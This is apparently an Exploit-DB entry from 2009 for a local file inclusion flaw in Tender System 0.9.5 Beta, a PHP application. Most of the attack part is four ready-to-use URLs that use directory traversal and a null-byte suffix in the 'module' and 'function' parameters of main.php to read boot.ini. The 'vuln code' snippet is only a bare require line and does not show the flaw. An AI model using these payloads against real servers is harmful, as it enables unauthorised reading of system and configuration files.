Tender System 0.9.5b - Local File Inclusion

EDB-ID:

10445

CVE:

N/A




Platform:

PHP

Date:

2009-12-14


  __________                __           __      .___             __  .__     
  \______   \_____    ____ |  | __ _____/  |_  __| _/____ _____ _/  |_|  |__  
   |     ___/\__  \ _/ ___\|  |/ // __ \   __\/ __ |/ __ \\__  \\   __\  |  \ 
   |    |     / __ \\  \___|    <\  ___/|  | / /_/ \  ___/ / __ \|  | |   Y  \
   |____|    (____  /\___  >__|_ \\___  >__| \____ |\___  >____  /__| |___|  /
                  \/     \/     \/    \/          \/    \/     \/          \/ 
				  
-------------------------------------------------------------------------------------------
Note: TESTED LOCALLY WITH XAMPP FOR WINDOWS 
I was unable to get this to work on a Linux server. Further testing may be required.
 ------------------------------------------------------------------------------------------
Target: TenderSystem 
Version: 0.9.5 Beta
Site  http://www.tendersystem.com/
Demo: http://demo.tendersystem.com/
Date: 2-14-2009
-------------------------------------------------------------------------------------------
Author: Packetdeath
Homepage: www.ssteam.ws
Contact: yaii_abc@hotmail.com
-------------------------------------------------------------------------------------------
Greetz: bi0, AnnexxEmpire and the rest of SSTeam.ws
------------------------------------------------------------------------------------------- 

Exploit:
http://127.0.0.1/tendersystem/main.php?module=../../../../../../../../boot.ini%00.html&function=login



http://127.0.0.1/tendersystem/main.php?module=../../../../../../../../boot.ini%00.jpg&function=login



http://127.0.0.1/tendersystem/main.php?module=session&function=../../../../../../../../boot.ini%00.html


http://127.0.0.1/tendersystem/main.php?module=session&function=../../../../../../../../boot.ini%00.jpg
-------------------------------------------------------------------------------------------------------
Vuln code in main.php: 

// load required files
require('modules/generic/ts_main.php');
?>
-------------------------------------------------------------------------------------------------------

Some things are better left unsaid <3
... That is all.

/Packetdeath